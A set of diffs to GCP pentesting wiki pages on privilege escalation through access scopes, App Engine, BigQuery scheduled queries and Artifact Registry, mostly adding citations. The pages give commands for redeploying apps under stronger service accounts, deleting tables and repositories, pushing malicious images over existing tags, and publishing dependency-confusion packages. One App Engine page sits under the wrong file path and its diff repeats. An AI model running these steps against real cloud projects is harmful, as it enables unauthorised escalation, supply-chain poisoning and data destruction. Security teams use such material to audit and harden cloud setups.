+2. Add in tests/ the new script<sup>[[4]](#references)</sup>
 
 ## Bypassing access scopes <a href="#bypassing-access-scopes" id="bypassing-access-scopes"></a>
 
-Tokens of SA leakded from GCP metadata service have **access scopes**. These are **restrictions** on the **permissions** that the token has. For example, if the token has the **`https://www.googleapis.com/auth/cloud-platform`** scope, it will have **full access** to all GCP services. However, if the token has the **`https://www.googleapis.com/auth/cloud-platform.read-only`** scope, it will only have **read-only access** to all GCP services even if the SA has more permissions in IAM.
+Tokens of SA leakded from GCP metadata service have **access scopes**. These are **restrictions** on the **permissions** that the token has. For example, if the token has the **`https://www.googleapis.com/auth/cloud-platform`** scope, it can request access across GCP services, subject to the service account's IAM permissions. However, if the token has the **`https://www.googleapis.com/auth/cloud-platform.read-only`** scope, it will only have **read-only access** to all GCP services even if the SA has more permissions in IAM.<sup>[[3]](#references)[[7]](#references)[[8]](#references)[[9]](#references)</sup>
 
-There is no direct way to bypass these permissions, but you could always try searching for **new credentials** in the compromised host, **find the service key** to generate an OAuth token without restriction or **jump to a different VM less restricted**.
+There is no direct way to bypass these permissions, but you could always try searching for **new credentials** in the compromised host, **find the service key** to generate an OAuth token without restriction or **jump to a different VM less restricted**.<sup>[[3]](#references)</sup>
 
-When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the computing instance (VM) will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. However, you might be able to **bypass** this limitation and exploit the permissions the compromised account has.
+When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the computing instance (VM) will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. However, you might be able to **bypass** this limitation and exploit the permissions the compromised account has.<sup>[[3]](#references)[[7]](#references)[[8]](#references)</sup>
 
-The **best way to bypass** this restriction is either to **find new credentials** in the compromised host, to **find the service key to generate an OAuth token** without restriction or to **compromise a different VM with a SA less restricted**.
+The **best way to bypass** this restriction is either to **find new credentials** in the compromised host, to **find the service key to generate an OAuth token** without restriction or to **compromise a different VM with a SA less restricted**.<sup>[[3]](#references)</sup>
 
-Check SA with keys generated with:
+Check SA with keys generated with:<sup>[[3]](#references)[[10]](#references)</sup>
 
 ```bash
 for i in $(gcloud iam service-accounts list --format="table[no-heading](email)"); do
@@ -50,7 +48,7 @@ done
 
 ## Privilege Escalation Techniques
 
-The way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other service account/users/groups privileges. Chaining escalations until you have admin access over the organization.
+The way to escalate your privileges in GCP is to have enough permissions to be able to, somehow, access other service account/users/groups privileges. Chaining escalations until you have admin access over the organization.
 
 > [!WARNING]
 > GCP has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**.
@@ -67,11 +65,15 @@ gcp-local-privilege-escalation-ssh-pivoting.md
 
 ## References
 
-- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
-- [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner)
-- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+- [1] [Privilege Escalation in Google Cloud Platform – Part 1 (IAM)](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+- [2] [Privilege Escalation in Google Cloud Platform – Part 2 (Non-IAM)](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner)
+- [3] [Google Cloud privilege escalation & post-exploitation tactics](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+- [4] [gcp_privesc_scripts](https://github.com/carlospolop/gcp_privesc_scripts)
+- [5] [IAM overview](https://cloud.google.com/iam/docs/overview)
+- [6] [Service accounts overview](https://cloud.google.com/iam/docs/service-account-overview)
+- [7] [Service accounts | Compute Engine](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam)
+- [8] [OAuth 2.0 Scopes](https://oauth.net/2/scope/)
+- [9] [OAuth 2.0 Scopes for Google APIs](https://developers.google.com/identity/protocols/oauth2/scopes)
+- [10] [gcloud iam service-accounts keys list](https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/keys/list)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md
@@ -33,7 +33,7 @@ The URL of the application is something like `https://<proj-name>.oa.r.appspot.c
 
 You might have enough permissions to update an AppEngine but not to create a new one. In that case this is how you could update the current App Engine:
 
-The deployment command used below is the documented `gcloud app deploy` flow, and the service-account update syntax is also documented.<sup>[[12]](#references)[[4]](#references)</sup>
+The deployment command used below is the documented `gcloud app deploy` flow, and the service-account update syntax is also documented.<sup>[[4]](#references)[[12]](#references)</sup>
 
 ```bash
 # Find the code of the App Engine in the buckets

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md
@@ -1,7 +1,5 @@
 # GCP - AppEngine Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## App Engine
 
 For more information about App Engine check:
@@ -12,12 +10,12 @@ For more information about App Engine check:
 
 ### `appengine.applications.get`, `appengine.instances.get`, `appengine.instances.list`, `appengine.operations.get`, `appengine.operations.list`, `appengine.services.get`, `appengine.services.list`, `appengine.versions.create`, `appengine.versions.get`, `appengine.versions.list`, `cloudbuild.builds.get`,`iam.serviceAccounts.actAs`, `resourcemanager.projects.get`, `storage.objects.create`, `storage.objects.list`
 
-Those are the needed permissions to **deploy an App using `gcloud` cli**. Maybe the **`get`** and **`list`** ones could be **avoided**.
+These are the operation-level permissions commonly needed to **deploy an App using the `gcloud` CLI**. Google documents the equivalent deployment roles as App Engine Deployer plus Service Account User, with Cloud Storage Object Admin and Cloud Build Editor also needed for `gcloud`; the exact **`get`** and **`list`** calls can vary by project and command path.<sup>[[2]](#references)</sup>
 
-You can find python code examples in [https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine](https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine)
+You can find Python code examples in [https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine](https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine)<sup>[[1]](#references)[[12]](#references)</sup>
 
-By default, the name of the App service is going to be **`default`**, and there can be only 1 instance with the same name.\
-To change it and create a second App, in **`app.yaml`**, change the value of the root key to something like **`service: my-second-app`**
+By default, the name of the App Engine service is **`default`**, and there can be only one service with a given name.\
+To change it and create a second service, in **`app.yaml`**, change the value of the root key to something like **`service: my-second-app`**.<sup>[[3]](#references)</sup>
 
 ```bash
 cd python-docs-samples/appengine/flexible/hello_world
@@ -27,13 +25,15 @@ gcloud app deploy #Upload and start application inside the folder
 Give it at least 10-15min, if it doesn't work call **deploy another of times** and wait some minutes.
 
 > [!NOTE]
-> It's **possible to indicate the Service Account to use** but by default, the App Engine default SA is used.
+> It's **possible to indicate the Service Account to use** but by default, the App Engine default SA is used.<sup>[[4]](#references)</sup>
 
-The URL of the application is something like `https://<proj-name>.oa.r.appspot.com/` or `https://<service_name>-dot-<proj-name>.oa.r.appspot.com`
+The URL of the application is something like `https://<proj-name>.oa.r.appspot.com/` or `https://<service_name>-dot-<proj-name>.oa.r.appspot.com`; the region segment varies by application.<sup>[[12]](#references)</sup>
 
 ### Update equivalent permissions
 
 You might have enough permissions to update an AppEngine but not to create a new one. In that case this is how you could update the current App Engine:
+
+The deployment command used below is the documented `gcloud app deploy` flow, and the service-account update syntax is also documented.<sup>[[12]](#references)[[4]](#references)</sup>
 
 ```bash
 # Find the code of the App Engine in the buckets
@@ -66,7 +66,7 @@ gcloud app deploy
 gcloud app update --service-account=<sa>@$PROJECT_ID.iam.gserviceaccount.com
 ```
 
-If you have **already compromised a AppEngine** and you have the permission **`appengine.applications.update`** and **actAs** over the service account to use you could modify the service account used by AppEngine with:
+If you have **already compromised an AppEngine** and have the permission **`appengine.applications.update`** plus **actAs** over the service account to use, you could modify the service account used by AppEngine with:<sup>[[4]](#references)</sup>
 
 ```bash
 gcloud app update --service-account=<sa>@$PROJECT_ID.iam.gserviceaccount.com
@@ -74,7 +74,7 @@ gcloud app update --service-account=<sa>@$PROJECT_ID.iam.gserviceaccount.com
 
 ### `appengine.instances.enableDebug`, `appengine.instances.get`, `appengine.instances.list`, `appengine.operations.get`, `appengine.services.get`, `appengine.services.list`, `appengine.versions.get`, `appengine.versions.list`, `compute.projects.get`
 
-With these permissions, it's possible to **login via ssh in App Engine instances** of type **flexible** (not standard). Some of the **`list`** and **`get`** permissions **could not be really needed**.
+With these permissions, it's possible to **log in via SSH to App Engine instances** of type **flexible** (not standard). Google documents `appengine.instances.enableDebug` for enabling SSH on flexible VMs and `gcloud app instances ssh` for connecting to a running instance. Some of the **`list`** and **`get`** permissions **could not be really needed**.<sup>[[5]](#references)[[6]](#references)</sup>
 
 ```bash
 gcloud app instances ssh --service <app-name> --version <version-id> <ID>
@@ -82,7 +82,7 @@ gcloud app instances ssh --service <app-name> --version <version-id> <ID>
 
 ### `appengine.applications.update`, `appengine.operations.get`
 
-I think this just change the background SA google will use to setup the applications, so I don't think you can abuse this to steal the service account.
+Changing the app-level default service account affects only versions deployed after the update; existing versions continue using their current service account. It changes the identity App Engine uses, not credentials that can be read directly, so it does not by itself steal the service account.<sup>[[4]](#references)</sup>
 
 ```bash
 gcloud app update --service-account=<sa_email>
@@ -94,7 +94,7 @@ Not sure how to use these permissions or if they are useful (note that when you 
 
 ### `bigquery.tables.delete`, `bigquery.datasets.delete` & `bigquery.models.delete` (`bigquery.models.getMetadata`)
 
-To remove tables, dataset or models:
+To remove tables, datasets, or models, use these documented `bq rm` forms:<sup>[[8]](#references)</sup>
 ```bash
 # Table removal
 bq rm -f -t <PROJECT_ID>.<DATASET>.<TABLE_NAME>
@@ -108,11 +108,13 @@ bq rm -m <PROJECT_ID>:<DATASET_NAME>.<MODEL_NAME>
 
 ### Abuse of Scheduled Queries
 
-With the `bigquery.datasets.get`, `bigquery.jobs.create`, and `iam.serviceAccounts.actAs` permissions, an identity can query dataset metadata, launch BigQuery jobs, and execute them using a Service Account with higher privileges.
+With the `bigquery.datasets.get`, `bigquery.jobs.create`, and `iam.serviceAccounts.actAs` permissions, an identity can query dataset metadata, launch BigQuery jobs, and execute them using a Service Account with higher privileges.<sup>[[7]](#references)</sup>
 
-This attack enables malicious use of Scheduled Queries to automate queries (running under the chosen Service Account), which can, for example, lead to sensitive data being read and written into another table or dataset that the attacker does have access to—facilitating indirect and continuous exfiltration without needing to extract the data externally.
+For the `bq` workflow shown below, Google also documents `bigquery.transfers.get` (or the alternative transfer permissions) to create the scheduled query and access to the selected service account; the Service Account User role is one documented way to provide that access.<sup>[[7]](#references)</sup>
 
-Once the attacker knows which Service Account has the necessary permissions to execute the desired query, they can create a Scheduled Query configuration that runs using that Service Account and periodically writes the results into a dataset of their choosing.
+This attack—an inference from the documented service-account execution and destination-table controls—enables malicious use of Scheduled Queries to automate queries (running under the chosen Service Account), which can, for example, lead to sensitive data being read and written into another table or dataset that the attacker does have access to—facilitating indirect and continuous exfiltration without needing to extract the data externally.<sup>[[7]](#references)</sup>
+
+Once the attacker knows which Service Account has the necessary permissions to execute the desired query, they can create a Scheduled Query configuration that runs using that Service Account and periodically writes the results into a dataset of their choosing.<sup>[[7]](#references)</sup>
 
 ```bash
 bq mk \
@@ -134,11 +136,11 @@ bq mk \
 
 ### Write Access over the buckets
 
-As mentioned the appengine versions generate some data inside a bucket with the format name: `staging.<project-id>.appspot.com`. Note that it's not possible to pre-takeover this bucket because GCP users aren't authorized to generate buckets using the domain name `appspot.com`.
+As mentioned, App Engine versions generate some data inside a bucket with the format name: `staging.<project-id>.appspot.com`. Google documents this as an App Engine-only staging bucket. Because Cloud Storage requires authorization for domain-named buckets, a normal GCP user cannot pre-take over an `appspot.com` bucket.<sup>[[9]](#references)[[10]](#references)</sup>
 
-However, with read & write access over this bucket, it's possible to escalate privileges to the SA attached to the AppEngine version by monitoring the bucket and any time a change is performed, modify as fast as possible the code. This way, the container that gets created from this code will **execute the backdoored code**.
+However, with read & write access over this bucket, it's possible to escalate privileges to the SA attached to the AppEngine version by monitoring the bucket and, any time a change is performed, modifying the code as fast as possible. This way, the container that gets created from this code will **execute the backdoored code**.<sup>[[11]](#references)</sup>
 
-For more information and a **PoC check the relevant information from this page**:
+For more information and a **PoC check the relevant information from this page**:<sup>[[11]](#references)</sup>
 
 {{#ref}}
 gcp-storage-privesc.md
@@ -146,10 +148,24 @@ gcp-storage-privesc.md
 
 ### Write Access over the Artifact Registry
 
-Even though App Engine creates docker images inside Artifact Registry. It was tested that **even if you modify the image inside this service** and removes the App Engine instance (so a new one is deployed) the **code executed doesn't change**.\
+App Engine builds a container image during flexible deployment, and current deployments store those images in Artifact Registry.<sup>[[12]](#references)[[13]](#references)</sup>
+It was tested that **even if you modify the image inside this service** and remove the App Engine instance (so a new one is deployed), the **code executed doesn't change**.\
 It might be possible that performing a **Race Condition attack like with the buckets it might be possible to overwrite the executed code**, but this wasn't tested.
 
+## References
+
+- [1] [App Engine samples | python-docs-samples](https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine)
+- [2] [Roles that grant access to App Engine | Google Cloud Documentation](https://cloud.google.com/appengine/docs/flexible/roles)
+- [3] [App Engine flexible environment `app.yaml` reference | Google Cloud Documentation](https://cloud.google.com/appengine/docs/flexible/reference/app-yaml)
+- [4] [Configure App Engine service accounts | Google Cloud Documentation](https://cloud.google.com/appengine/docs/flexible/configure-service-accounts)
+- [5] [Debugging an instance | App Engine flexible environment | Google Cloud Documentation](https://cloud.google.com/appengine/docs/flexible/debugging-an-instance)
+- [6] [gcloud app instances ssh | Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/app/instances/ssh)
+- [7] [Scheduling queries | BigQuery | Google Cloud Documentation](https://cloud.google.com/bigquery/docs/scheduling-queries)
+- [8] [bq command-line tool reference | BigQuery | Google Cloud Documentation](https://cloud.google.com/bigquery/docs/reference/bq-cli-reference)
+- [9] [Use Cloud Storage | App Engine standard environment | Google Cloud Documentation](https://cloud.google.com/appengine/docs/standard/using-cloud-storage)
+- [10] [Domain-named bucket verification | Cloud Storage | Google Cloud Documentation](https://cloud.google.com/storage/docs/domain-name-verification)
+- [11] [Monitor & Backdoor App Engine](https://github.com/carlospolop/Monitor-Backdoor-AppEngine)
+- [12] [Test and deploy your application | App Engine flexible environment | Google Cloud Documentation](https://cloud.google.com/appengine/docs/flexible/testing-and-deploying-your-app)
+- [13] [Migrate App Engine container images to Artifact Registry | Google Cloud Documentation](https://cloud.google.com/appengine/migration-center/migrate-to-artifact-registry)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md
@@ -1,7 +1,5 @@
 # GCP - AppEngine Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## App Engine
 
 For more information about App Engine check:
@@ -12,12 +10,14 @@ For more information about App Engine check:
 
 ### `appengine.applications.get`, `appengine.instances.get`, `appengine.instances.list`, `appengine.operations.get`, `appengine.operations.list`, `appengine.services.get`, `appengine.services.list`, `appengine.versions.create`, `appengine.versions.get`, `appengine.versions.list`, `cloudbuild.builds.get`,`iam.serviceAccounts.actAs`, `resourcemanager.projects.get`, `storage.objects.create`, `storage.objects.list`
 
-Those are the needed permissions to **deploy an App using `gcloud` cli**. Maybe the **`get`** and **`list`** ones could be **avoided**.
+Those are the permissions observed for **deploying an App using the `gcloud` CLI**; some of the **`get`** and **`list`** permissions could be **avoided**.
 
-You can find python code examples in [https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine](https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine)
+Google's current role guidance calls for App Engine Deployer, Service Account User, Cloud Build Editor, and Cloud Storage Object Admin when deploying with `gcloud`, so the exact effective set can vary with the environment and workflow.<sup>[[1]](#references)[[2]](#references)</sup>
 
-By default, the name of the App service is going to be **`default`**, and there can be only 1 instance with the same name.\
-To change it and create a second App, in **`app.yaml`**, change the value of the root key to something like **`service: my-second-app`**
+You can find Python code examples in [https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine](https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine).<sup>[[3]](#references)</sup>
+
+By default, the name of the App Engine service is **`default`**, and each service and version name must be unique; this is a naming constraint, not a limit of one running instance.\
+To change it and create a second App, in **`app.yaml`**, change the value of the root key to something like **`service: my-second-app`**.<sup>[[4]](#references)</sup>
 
 <details>
 <summary>Deploy App Engine application</summary>
@@ -29,12 +29,14 @@ gcloud app deploy #Upload and start application inside the folder
 
 </details>
 
+The `gcloud app deploy` command deploys the local service code and configuration to App Engine.<sup>[[5]](#references)</sup>
+
 Give it at least 10-15min, if it doesn't work call **deploy another of times** and wait some minutes.
 
 > [!NOTE]
-> It's **possible to indicate the Service Account to use** but by default, the App Engine default SA is used.
+> It's **possible to indicate the Service Account to use** but by default, the App Engine default SA is used.<sup>[[5]](#references)[[6]](#references)</sup>
 
-The URL of the application is something like `https://<proj-name>.oa.r.appspot.com/` or `https://<service_name>-dot-<proj-name>.oa.r.appspot.com`
+The URL of the application is something like `https://<proj-name>.oa.r.appspot.com/` or `https://<service_name>-dot-<proj-name>.oa.r.appspot.com`.<sup>[[7]](#references)</sup>
 
 ### Update equivalent permissions
 
@@ -76,7 +78,7 @@ gcloud app update --service-account=<sa>@$PROJECT_ID.iam.gserviceaccount.com
 
 </details>
 
-If you have **already compromised a AppEngine** and you have the permission **`appengine.applications.update`** and **actAs** over the service account to use you could modify the service account used by AppEngine with:
+If you have **already compromised an App Engine** and have the permission **`appengine.applications.update`** plus **`iam.serviceAccounts.actAs`** over the service account to use, you could modify the service account used by App Engine with:<sup>[[1]](#references)[[6]](#references)[[10]](#references)</sup>
 
 <details>
 <summary>Update App Engine service account</summary>
@@ -89,7 +91,7 @@ gcloud app update --service-account=<sa>@$PROJECT_ID.iam.gserviceaccount.com
 
 ### `appengine.instances.enableDebug`, `appengine.instances.get`, `appengine.instances.list`, `appengine.operations.get`, `appengine.services.get`, `appengine.services.list`, `appengine.versions.get`, `appengine.versions.list`, `compute.projects.get`
 
-With these permissions, it's possible to **login via ssh in App Engine instances** of type **flexible** (not standard). Some of the **`list`** and **`get`** permissions **could not be really needed**.
+With these permissions, it's possible to **log in via SSH to App Engine instances** of type **flexible** (not standard). Some of the **`list`** and **`get`** permissions **could not be really needed**.<sup>[[1]](#references)[[9]](#references)</sup>
 
 <details>
 <summary>SSH into App Engine instance</summary>
@@ -102,7 +104,7 @@ gcloud app instances ssh --service <app-name> --version <version-id> <ID>
 
 ### `appengine.applications.update`, `appengine.operations.get`
 
-I think this just change the background SA google will use to setup the applications, so I don't think you can abuse this to steal the service account.
+This changes the app-level default service account used by subsequently deployed versions. `appengine.applications.update` alone does not impersonate an arbitrary service account: attaching the runtime identity requires **`iam.serviceAccounts.actAs`**, while token impersonation uses separate permissions. Therefore, these permissions alone should not be treated as a way to steal the service account.<sup>[[6]](#references)[[8]](#references)[[10]](#references)</sup>
 
 <details>
 <summary>Update application service account</summary>
@@ -115,13 +117,13 @@ gcloud app update --service-account=<sa_email>
 
 ### `appengine.versions.getFileContents`, `appengine.versions.update`
 
-Not sure how to use these permissions or if they are useful (note that when you change the code a new version is created so I don't know if you can just update the code or the IAM role of one, but I guess you should be able to, maybe changing the code inside the bucket??).
+These permissions expose two different capabilities: `appengine.versions.getFileContents` is the Code Viewer permission for reading deployed source, while `appengine.versions.update` authorizes the Admin API's version-update method, which patches only the fields supported for the selected environment and scaling mode. They do not by themselves provide a direct source-code overwrite path; code and resources are supplied when a new version is created, so changing the code creates a new version. The bucket-manifest race described below is a separate deployment-time path, not a consequence of `versions.update` alone.<sup>[[1]](#references)[[11]](#references)[[12]](#references)</sup>
 
 ### Write Access over the buckets
 
-As mentioned the appengine versions generate some data inside a bucket with the format name: `staging.<project-id>.appspot.com`. Note that it's not possible to pre-takeover this bucket because GCP users aren't authorized to generate buckets using the domain name `appspot.com`.
+App Engine creates a temporary deployment bucket named `staging.<project-id>.appspot.com`; the bucket is intended for App Engine's use. The Admin API's version deployment metadata contains a Cloud Storage-backed manifest with each file's source URL and SHA-1 value.<sup>[[11]](#references)[[13]](#references)</sup> It is not possible to pre-take over this bucket because GCP users aren't authorized to create buckets using the `appspot.com` domain.<sup>[[14]](#references)</sup>
 
-However, with read & write access over this bucket, it's possible to escalate privileges to the SA attached to the AppEngine version by monitoring the bucket and any time a change is performed, modify as fast as possible the code. This way, the container that gets created from this code will **execute the backdoored code**.
+However, an external identity with read and write access over this bucket can escalate privileges to the SA attached to the App Engine version by monitoring the bucket and, whenever a change is performed, modifying the code as fast as possible. This way, the container created from this code will **execute the backdoored code**.<sup>[[14]](#references)</sup>
 
 For more information and a **PoC check the relevant information from this page**:
 
@@ -131,10 +133,25 @@ gcp-storage-privesc.md
 
 ### Write Access over the Artifact Registry
 
-Even though App Engine creates docker images inside Artifact Registry. It was tested that **even if you modify the image inside this service** and removes the App Engine instance (so a new one is deployed) the **code executed doesn't change**.\
+Even though App Engine creates Docker images inside Artifact Registry, the flexible deployment flow uses Cloud Build to build a container image, and `gcloud app deploy` supports Artifact Registry images.<sup>[[5]](#references)[[15]](#references)</sup> It was tested that **even if you modify the image inside this service** and removes the App Engine instance (so a new one is deployed) the **code executed doesn't change**.\
 It might be possible that performing a **Race Condition attack like with the buckets it might be possible to overwrite the executed code**, but this wasn't tested.
 
+## References
+
+- [1] [App Engine roles and permissions](https://cloud.google.com/iam/docs/roles-permissions/appengine)
+- [2] [Roles that grant access to App Engine](https://cloud.google.com/appengine/docs/standard/roles)
+- [3] [python-docs-samples/appengine](https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine)
+- [4] [App Engine app.yaml reference](https://cloud.google.com/appengine/docs/standard/reference/app-yaml)
+- [5] [gcloud app deploy](https://cloud.google.com/sdk/gcloud/reference/app/deploy)
+- [6] [Configure App Engine service accounts](https://cloud.google.com/appengine/docs/standard/configure-service-accounts)
+- [7] [How requests are routed](https://cloud.google.com/appengine/docs/standard/how-requests-are-routed)
+- [8] [gcloud app update](https://cloud.google.com/sdk/gcloud/reference/app/update)
+- [9] [gcloud app instances ssh](https://cloud.google.com/sdk/gcloud/reference/app/instances/ssh)
+- [10] [Roles for service account authentication](https://cloud.google.com/iam/docs/service-account-permissions)
+- [11] [REST Resource: apps.services.versions](https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1/apps.services.versions)
+- [12] [Method: apps.services.versions.patch](https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1/apps.services.versions/patch)
+- [13] [Use Cloud Storage](https://cloud.google.com/appengine/docs/standard/using-cloud-storage)
+- [14] [Monitor & Backdoor App Engine](https://github.com/carlospolop/Monitor-Backdoor-AppEngine)
+- [15] [Test and deploy your application](https://cloud.google.com/appengine/docs/flexible/testing-and-deploying-your-app)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md
@@ -1,7 +1,5 @@
 # GCP - Artifact Registry Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Artifact Registry
 
 For more information about Artifact Registry check:
@@ -12,7 +10,7 @@ For more information about Artifact Registry check:
 
 ### artifactregistry.repositories.uploadArtifacts
 
-With this permission an attacker could upload new versions of the artifacts with malicious code like Docker images:
+With this permission an attacker could upload new versions of the artifacts with malicious code like Docker images:<sup>[[1]](#references)[[2]](#references)</sup>
 
 <details>
 <summary>Upload Docker image to Artifact Registry</summary>
@@ -31,7 +29,7 @@ docker push <location>-docker.pkg.dev/<proj-name>/<repo-name>/<img-name>:<tag>
 </details>
 
 > [!CAUTION]
-> It was checked that it's **possible to upload a new malicious docker** image with the same name and tag as the one already present, so the **old one will lose the tag** and next time that image with that tag is **downloaded the malicious one** will be downloaded.
+> It was checked that it's **possible to upload a new malicious docker** image with the same name and tag as the one already present, so the **old one will lose the tag** and next time that image with that tag is **downloaded the malicious one** will be downloaded.<sup>[[3]](#references)</sup>
 
 <details>
 
@@ -97,7 +95,7 @@ docker push <location>-docker.pkg.dev/<proj-name>/<repo-name>/<img-name>:<tag>
 
     </details>
 
-**Now, lets upload the library:**
+**Now, lets upload the library:**<sup>[[4]](#references)</sup>
 
 1.  **Build your package**:
 
@@ -139,7 +137,7 @@ rm -rf dist build hello_world.egg-info
 </details>
 
 > [!CAUTION]
-> It's not possible to upload a python library with the same version as the one already present, but it's possible to upload **greater versions** (or add an extra **`.0` at the end** of the version if that works -not in python though-), or to **delete the last version an upload a new one with** (needed `artifactregistry.versions.delete)`**:**
+> It's not possible to upload a python library with the same version as the one already present, but it's possible to upload **greater versions** (or add an extra **`.0` at the end** of the version if that works -not in python though-), or to **delete the last version an upload a new one with** (needed `artifactregistry.versions.delete)`**.** To replace a version after deletion, use this documented command:<sup>[[4]](#references)</sup>
 >
 > <details>
 > <summary>Delete artifact version</summary>
@@ -152,9 +150,9 @@ rm -rf dist build hello_world.egg-info
 
 ### `artifactregistry.repositories.downloadArtifacts`
 
-With this permission you can **download artifacts** and search for **sensitive information** and **vulnerabilities**.
+With this permission you can **download artifacts** and search for **sensitive information** and **vulnerabilities**.<sup>[[1]](#references)[[4]](#references)</sup>
 
-Download a **Docker** image:
+Download a **Docker** image:<sup>[[2]](#references)</sup>
 
 <details>
 <summary>Download Docker image from Artifact Registry</summary>
@@ -169,7 +167,7 @@ docker pull <location>-docker.pkg.dev/<proj-name>/<repo-name>/<img-name>:<tag>
 
 </details>
 
-Download a **python** library:
+Download a **python** library:<sup>[[4]](#references)</sup>
 
 <details>
 <summary>Download Python library from Artifact Registry</summary>
@@ -188,7 +186,7 @@ pip install <lib-name> --index-url "https://oauth2accesstoken:$(gcloud auth prin
 
 ### `artifactregistry.tags.delete`, `artifactregistry.versions.delete`, `artifactregistry.packages.delete`, (`artifactregistry.repositories.get`, `artifactregistry.tags.get`, `artifactregistry.tags.list`)
 
-Delete artifacts from the registry, like docker images:
+Delete artifacts from the registry, like docker images:<sup>[[1]](#references)[[3]](#references)</sup>
 
 <details>
 <summary>Delete Docker image from Artifact Registry</summary>
@@ -202,7 +200,7 @@ gcloud artifacts docker images delete <location>-docker.pkg.dev/<proj-name>/<rep
 
 ### `artifactregistry.repositories.delete`
 
-Detele a full repository (even if it has content):
+Detele a full repository (even if it has content):<sup>[[1]](#references)[[7]](#references)</sup>
 
 <details>
 <summary>Delete Artifact Registry repository</summary>
@@ -215,7 +213,7 @@ gcloud artifacts repositories delete <repo-name> --location=<location>
 
 ### `artifactregistry.repositories.setIamPolicy`
 
-An attacker with this permission could give himself permissions to perform some of the previously mentioned repository attacks.
+An attacker with this permission could give himself permissions to perform some of the previously mentioned repository attacks.<sup>[[1]](#references)</sup>
 
 ### Pivoting to other Services through Artifact Registry Read & Write
 
@@ -230,11 +228,11 @@ It might be possible that performing a **Race Condition attack like with the buc
 
 
 ### `artifactregistry.repositories.update`
-An attacker does not need specific Artifact Registry permissions to exploit this issue—only a vulnerable virtual-repository configuration. This occurs when a virtual repository combines a remote public repository (e.g., PyPI, npm) with an internal one, and the remote source has equal or higher priority. If both contain a package with the same name, the system selects the highest version. The attacker only needs to know the internal package name and be able to publish packages to the corresponding public registry.
+An attacker does not need specific Artifact Registry permissions to exploit this issue—only a vulnerable virtual-repository configuration. A virtual repository can combine a remote public repository (e.g., PyPI, npm) with an internal one; upstream priority controls which repository is used when the same package version is available, while clients configured to search both private and public indexes may choose the latest version. The attacker only needs to know the internal package name and be able to publish packages to the corresponding public registry.<sup>[[5]](#references)</sup>
 
-With the `artifactregistry.repositories.update` permission, an attacker could change a virtual repository’s upstream settings to intentionally create this vulnerable setup and use Dependency Confusion as a persistence method by inserting malicious packages that developers or CI/CD systems may install automatically.
+With the `artifactregistry.repositories.update` permission, an attacker could change a virtual repository’s upstream settings to intentionally create this vulnerable setup and use Dependency Confusion as a persistence method by inserting malicious packages that developers or CI/CD systems may install automatically.<sup>[[1]](#references)[[5]](#references)[[6]](#references)</sup>
 
-The attacker creates a malicious version of the internal package in the public repository with a higher version number. For Python packages, this means preparing a package structure that mimics the legitimate one.
+The attacker creates a malicious version of the internal package in the public repository with a higher version number. For Python packages, this means preparing a package structure that mimics the legitimate one.<sup>[[5]](#references)</sup>
 
 ```bash
 mkdir /tmp/malicious_package
@@ -280,15 +278,24 @@ python3 setup.py sdist bdist_wheel
 rm dist/<package-name>*.whl
 ```
 
-Upload the malicious package to the public repository (for example, test.pypi.org for Python).
+Upload the malicious package to the public repository (for example, test.pypi.org for Python).<sup>[[8]](#references)</sup>
 ```bash
 pip install twine
 twine upload --repository testpypi dist/*
 ```
 
